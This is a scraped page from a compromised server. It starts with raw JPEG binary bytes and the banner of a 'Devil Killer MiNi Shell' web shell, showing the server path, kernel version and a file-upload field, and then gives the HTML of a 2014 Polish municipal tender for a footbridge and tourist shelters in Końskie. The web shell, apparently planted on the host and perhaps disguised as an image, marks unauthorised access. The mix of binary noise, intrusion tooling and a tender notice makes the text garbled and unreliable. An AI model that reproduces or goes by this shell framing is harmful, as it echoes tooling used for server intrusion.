JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140221/34919-N-2014.html

<p class="kh_header"><b>Końskie: Zadanie nr 1 - Budowa kładki drewnianej - ciągu pieszo-rowerowego na rzece Czarnej w Sielpi Wielkiej
i/lub
Zadanie nr 2 - Uzupełnienie infrastruktury turystycznej w miejscowościach Stara Kuźnica i Niebo</b><br>
<b>Numer ogłoszenia: 34919 - 2014; data zamieszczenia: 21.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskie , ul. Partyzantów 1/24, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3723249, 3723720, faks 041 3722955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umkonskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 - Budowa kładki drewnianej - ciągu pieszo-rowerowego na rzece Czarnej w Sielpi Wielkiej
i/lub
Zadanie nr 2 - Uzupełnienie infrastruktury turystycznej w miejscowościach Stara Kuźnica i Niebo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Budowa kładki drewnianej - ciągu pieszo-rowerowego na rzece Czarnej w Sielpi Wielkiej

Przedmiotem zamówienia jest wykonanie kładki pieszo-rowerowej na rzece Czarna w km 48+ 450 w miejscowości Sielpia Wielka. Roboty będą wykonywane na działkach o nr ewid. 70/22, 70/32, 136, 138. W ramach zamówienia Wykonawca wykona również dojazdy łączące  obiekt  mostowy z drogą gminną - ul. Dorzeczną i docelowo dojazd do  działki nr 138.
Wszystkie elementy konstrukcyjne obiektu zaprojektowano w oparciu o obowiązujące normy techniczne oraz wytyczne i zalecenia dotyczące projektowania drogowych obiektów mostowych.
Parametry techniczno-użytkowe kładki pieszo-rowerowej:
Światło kładki 32,75 ,
Długość przęseł L1=6,65 m, L2=18,0m, L3= 11,30.
Całkowita długość kładki 36,05 m
Szerokość kładki w świetle poręczy 3,0m
Podpory-pale żelbetowe wykonane w rurach stalowych fi 360 mm L=6,00m
Spadek podłużny kładki - przęsło nr 1 - 5%
                                           przęsło nr 2 - 1%
                                           przęsło nr 3 - 5%
Projektowana kładka posadowiona jest na palach żelbetowych wykonanych w rurach stalowych fi 360 mm dł. L=6m - po 2 pale, łącznie 8 pali.
Oczepy żelbetowe: przęsło środkowe oczep 0,60 x 1,05 m, przęsła skrajne - oczep o wym. 0,60 x 0,80m. Jako ścianki zapleczne zastosowano płyty żelbetowe gr. 15cm.
Szczegóły określa załączona dokumentacja techniczna w tym przedmiar robót stanowiący materiał informacyjno-pomocniczy.
Zadanie nr 2 Uzupełnienie infrastruktury turystycznej w miejscowościach Stara Kuźnica i Niebo

Zamówienie dotyczy uzupełnienia istniejącej infrastruktury:
Stara Kuźnica - altana rekreacyjna o powierzchni 25 m2 (konstrukcja drewniana, dostosowana do istniejącej altany na tej działce). Podłogą altany będzie kostka brukowa 
o gr. 6 cm z opaską 0,5 m. W altanie zamontowany będzie stół drewniany i dwie ławy siedziskowe. W ramach zamówienia Wykonawca wybuduje grilla według wytycznych Zamawiającego (w załączeniu zdjęcie grilla którego trzeba rozbudować o wędzarkę i płytę żeliwną z 4 fajerkami). Usytuowanie należy uzgodnić z Zamawiającym.
Elementy pionowe - słupy o przekroju o przekroju 22x22 cm; krawędzie słupa
fazowane - po 1 cm na narożnikach; reszta słupa - wycięta do przekroju 18x18 cm. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie;
zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,50 m powyżej p.t.
Dach altany czterospadowy o konstrukcji krokwiowo-belkowej, pokryty gontem
o grubości 2,5 cm. Deski gontowe mocowane do łat o przekroju prostokątnym 8x6 cm. Łaty mocowane do krokwi o przekroju 14x12 cm. Krokwie stężone jętkami o przekroju 10x8 cm. Krokwie oparte na belkach pułapowych o przekroju 22x18 cm. Ozdobne miecze o gr. 10 cm mocowane do słupów i belek pułapowych za pomocą złącza ciesielskiego.
Niebo - dwa drewniane stoły z zadaszeniem (dostosowane do istniejącego zagospodarowania). Usytuowanie należy uzgodnić z Zamawiającym.
Element pionowy - słupy wykonany z belki o przekroju 18x18 cm; krawędzie
słupa fazowane - po 1 cm na narożnikach. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie; zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,95 m
powyżej p.t.
Dach na planie kwadratu, czterospadowy, pokryty gontem o gr. 2,5 cm. Pokrycie
dachu mocowane do łat o przekroju prostokątnym 6x4 cm. Łaty mocowane do krokwi 
o przekroju 10x8 cm. Krokwie podpierane przez zastrzały o przekroju 8x6 cm,
mocowane do słupa na wysokości 2 m p.pt. Belki tworzące ramę zadaszenia i belki wspierające, mocowane do ramy za pomocą złącza ciesielskiego o przekroju 10x8 cm.
Konstrukcja blatu stołu - foszt o gr. 10 cm, szer. 25 cm i dł. 100 cm, mocowane
do belek o przekroju 10x8 cm. Belki te mocowane są do słupa i wsparte dodatkowo belkami wspornikowymi o przekroju 8x8 cm. Dwa foszty wewnętrzne wycięte w
miejscu styku ze słupem. Do zadaszonego stołu dostawiane ławki (od 2 do 4 szt.) z oparciem lub bez.
Szczegóły określa załączona dokumentacja techniczna w tym przedmiar robót stanowiący materiał informacyjno-pomocniczy.

i/lub 

1.Jeżeli w SIWZ lub załącznikach została wskazana nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach nie gorszych niż wskazane w dokumentacji technicznej.
2.Dopuszcza się rozwiązania równoważne opisywane za pomocą norm, aprobat, specyfikacji technicznych lub systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy pzp.
3.Wypełnić obowiązki wynikające z decyzji Nr BP.6740.520.2013.JJ zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę  - dot. zadania 1
4.Przed rozpoczęciem robót należy opracować Projekt organizacji ruchu na czas prowadzenia robót i przedłożyć go do zatwierdzenia przez właściwe organy administracyjne.
5.Obowiązkiem Wykonawcy Robót jest zawiadomienie zainteresowanych właścicieli działek i budynków o terminach prowadzenia robót i ograniczeniach ruchu kołowego (pisma i tablice informacyjne).
6.O planowanym terminie wykonania wykopów należy zawiadomić Użytkowników istniejących rurociągów i kabli.
7.Zakończone prace należy zgłosić do odbioru wraz z dokumentacją powykonawczą zawierającą m.in. inwentaryzację geodezyjną powykonawczą co najmniej 14 dni przed planowanym odbiorem.
8.Każdy z Wykonawców winien odwiedzić miejsce budowy celem sprawdzenia warunków placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
9.Koszty odwiedzania miejsca budowy poniesie Wykonawca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia  Wykonawca winien wykazać się że wykonał w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną robotę budowlaną polegającą na : - budowie mostu/kładki drewnianej o parametrach nie gorszych niż 
w zamówieniu i o wartości nie mniejszej niż 150 000,00 zł. - dotyczy zadania nr 1
 i/lub
- budowie infrastruktury turystycznej służącej rekreacji o parametrach nie gorszych niż 
w zamówieniu i o wartości nie mniejszej niż 20 000,00 zł. - dotyczy zadania nr 2.
. Podstawą oceny spełnienia warunków, o których mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi 
do wykonania zamówienia: Wykonawca winien wykazać się co najmniej jedną osobą:
-Zadanie 1:	posiadającą uprawienia budowlane w specjalności mostowej bez ograniczeń - dotyczy zadania nr 1.
Podstawą oceny spełnienia warunków, o których mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W wykazie robót powinna zostać ujęta między in. co najmniej jedna robota budowlana polegająca na : - budowie mostu/kładki drewnianej o parametrach nie gorszych niż 
w zamówieniu i o wartości nie mniejszej niż 150 000,00 zł. - dotyczy zadania nr 1
 i/lub
- budowie infrastruktury turystycznej służącej rekreacji o parametrach nie gorszych niż 
w zamówieniu i o wartości nie mniejszej niż 20 000,00 zł. - dotyczy zadania nr 2.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany FORMULARZ OFERTOWY, którego wzorzec przedstawiono w rozdziale D niniejszej specyfikacji istotnych warunków zamówienia
b)  Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, 
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu musi 
w szczególności przedstawić pisemne zobowiązanie takich podmiotów do oddania mu 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
c) kosztorys ofertowy- z uwagi na ryczałtowy charakter wynagrodzenia stanowi materiał informacyjno-pomocniczy
d)  Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik, lub w przypadku wykonawców składających ofertę wspólną. Forma pełnomocnictwa: oryginał lub kopia poświadczona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie: 
1)	terminu zakończenia, ale tylko w przypadku wystąpienia robót dodatkowych w rozumieniu ustawy Prawo zamówień publicznych,
2)	 rezygnacji przez Zamawiającego z realizacji jego części, w takim przypadku   umowne wynagrodzenie Wykonawcy zostanie pomniejszone o wartość robót wyłączonych wyliczoną przy zastosowaniu cen jednostkowych i wskaźników kalkulacyjnych tożsamych z określonymi w kosztorysie ofertowym załączonym przez Wykonawcę do złożonej oferty, wyliczenia wartości robót wyłączonych dokonuje Wykonawca i wyliczenie to podlega zatwierdzeniu przez Zamawiającego,
3)	zmianie sposobu wykonania robót, o ile nie zmniejsza ich jakości i użyteczności, pod warunkiem zachowania przepisów prawa budowlanego, każda tego typu zmiana wymaga zgody Zamawiającego i nie może wpłynąć na zmianę umownego wynagrodzenia dla Wykonawcy.
2.	Możliwe są inne nieistotne zmiany, o ile te zmiany nie będą miały wpływu na zmianę terminu zakończenia realizacji robót określonego § 2 ust. 1 niniejszej umowy.
3.	Zmiany niniejszej umowy, o której mowa w niniejszym § oraz nieistotne zmiany umowy wymagają pisemnego aneksu pod rygorem nieważności i nie mogą być sprzeczne z postanowieniami ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych (Dz. U. z 2013r., poz. 907 z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umkonskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1, pok. 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 09:00, miejsce: Urząd Miasta i Gminy w Końskich, 26-200 Końskie ul. Partyzantów 1, pok. 24 
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW 2007-2013

UWAGA: wykaz osób oraz oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień dotyczy zadania nr 1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa kładki drewnianej - ciągu pieszo-rowerowego na rzece Czarnej w Sielpi Wielkiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kładki pieszo-rowerowej na rzece Czarna w km 48+ 450 w miejscowości Sielpia Wielka. Roboty będą wykonywane na działkach o nr ewid. 70/22, 70/32, 136, 138. W ramach zamówienia Wykonawca wykona również dojazdy łączące  obiekt  mostowy z drogą gminną - ul. Dorzeczną i docelowo dojazd do  działki nr 138.
Wszystkie elementy konstrukcyjne obiektu zaprojektowano w oparciu o obowiązujące normy techniczne oraz wytyczne i zalecenia dotyczące projektowania drogowych obiektów mostowych.
Parametry techniczno-użytkowe kładki pieszo-rowerowej:
Światło kładki 32,75 ,
Długość przęseł L1=6,65 m, L2=18,0m, L3= 11,30.
Całkowita długość kładki 36,05 m
Szerokość kładki w świetle poręczy 3,0m
Podpory-pale żelbetowe wykonane w rurach stalowych fi 360 mm L=6,00m
Spadek podłużny kładki - przęsło nr 1 - 5%
                                           przęsło nr 2 - 1%
                                           przęsło nr 3 - 5%
Projektowana kładka posadowiona jest na palach żelbetowych wykonanych w rurach stalowych fi 360 mm dł. L=6m - po 2 pale, łącznie 8 pali.
Oczepy żelbetowe: przęsło środkowe oczep 0,60 x 1,05 m, przęsła skrajne - oczep o wym. 0,60 x 0,80m. Jako ścianki zapleczne zastosowano płyty żelbetowe gr. 15cm.
Szczegóły określa załączona dokumentacja techniczna w tym przedmiar robót stanowiący materiał informacyjno-pomocniczy.
1.	Jeżeli w SIWZ lub załącznikach została wskazana nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach nie gorszych niż wskazane w dokumentacji technicznej.
2.	Dopuszcza się rozwiązania równoważne opisywane za pomocą norm, aprobat, specyfikacji technicznych lub systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy pzp.
3.	Wypełnić obowiązki wynikające z decyzji Nr BP.6740.520.2013.JJ zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę  - dot. zadania 1
4.	Przed rozpoczęciem robót należy opracować Projekt organizacji ruchu na czas prowadzenia robót i przedłożyć go do zatwierdzenia przez właściwe organy administracyjne.
5.	Obowiązkiem Wykonawcy Robót jest zawiadomienie zainteresowanych właścicieli działek i budynków o terminach prowadzenia robót i ograniczeniach ruchu kołowego (pisma i tablice informacyjne).
6.	O planowanym terminie wykonania wykopów należy zawiadomić Użytkowników istniejących rurociągów i kabli.
7.	Zakończone prace należy zgłosić do odbioru wraz z dokumentacją powykonawczą zawierającą m.in. inwentaryzację geodezyjną powykonawczą co najmniej 14 dni przed planowanym odbiorem.
8.	Każdy z Wykonawców winien odwiedzić miejsce budowy celem sprawdzenia warunków placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
9.	Koszty odwiedzania miejsca budowy poniesie Wykonawca..</p></li>
